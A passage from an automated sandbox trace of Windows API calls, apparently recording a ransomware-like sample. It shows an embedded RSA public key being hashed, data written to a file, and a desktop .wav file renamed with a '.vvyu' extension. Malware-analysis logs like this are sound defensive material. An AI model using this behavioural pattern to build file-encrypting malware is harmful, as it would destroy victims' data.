KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.166] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0191.168] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0191.168] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.168] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0191.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0191.168] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0191.179] GetLastError () returned 0x0 [0191.214] GetLastError () returned 0x0 [0191.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0191.214] GetLastError () returned 0x0 [0191.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0191.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.215] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0191.215] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0191.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0191.228] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0191.228] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0191.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0191.228] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0191.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6b70) returned 0x2d45778 [0191.229] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0191.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0191.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0191.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0191.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0191.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d306d0 [0191.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0191.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30718 [0191.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0191.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0191.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0191.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0191.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0191.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0191.350] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0191.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0191.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0191.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0191.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0191.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c58 [0191.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0191.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39c40 [0191.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0191.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0191.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0191.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0191.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0191.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0191.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0191.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0191.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0191.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0191.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0191.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0191.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0191.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0191.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0191.553] GetCurrentThreadId () returned 0x264 [0191.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0191.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44bd0 [0191.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0191.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0191.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0191.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0191.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0191.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0191.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.698] GetCurrentThreadId () returned 0x264 [0191.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0191.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0191.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0191.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0191.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0191.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0191.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0191.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0191.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0191.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0191.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c58 [0191.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0191.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0191.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cb8 [0191.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0191.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0191.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cd0 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c70 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c40 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0191.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0191.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0191.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0191.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0191.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0191.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0191.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0191.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30718 | out: hHeap=0x6a0000) returned 1 [0191.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0191.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0191.802] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x6b6e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x6b6e, lpOverlapped=0x0) returned 1 [0191.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0191.803] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6b73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.803] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0191.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0191.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0191.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0191.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0191.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0191.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0191.822] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0191.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.822] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.822] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0191.822] CloseHandle (hObject=0x584) returned 1 [0191.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0191.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d45778 [0191.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0191.824] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\Yn5TngP_hrElfEBI9s.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\yn5tngp_hrelfebi9s.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\Yn5TngP_hrElfEBI9s.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\yn5tngp_hrelfebi9s.wav.vvyu")) returned 1 [0191.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0191.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.826] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0191.829] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ba8060, ftCreationTime.dwHighDateTime=0x1d8970e, ftLastAccessTime.dwLowDateTime=0x2bd93e20, ftLastAccessTime.dwHighDateTime=0x1d8a658, ftLastWriteTime.dwLowDateTime=0x2bd93e20, ftLastWriteTime.dwHighDateTime=0x1d8a658, nFileSizeHigh=0x0, nFileSizeLow=0x6b73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yn5TngP_hrElfEBI9s.wav", cAlternateFileName="YN5TNG~1.WAV")) returned 0 [0191.829] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0191.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 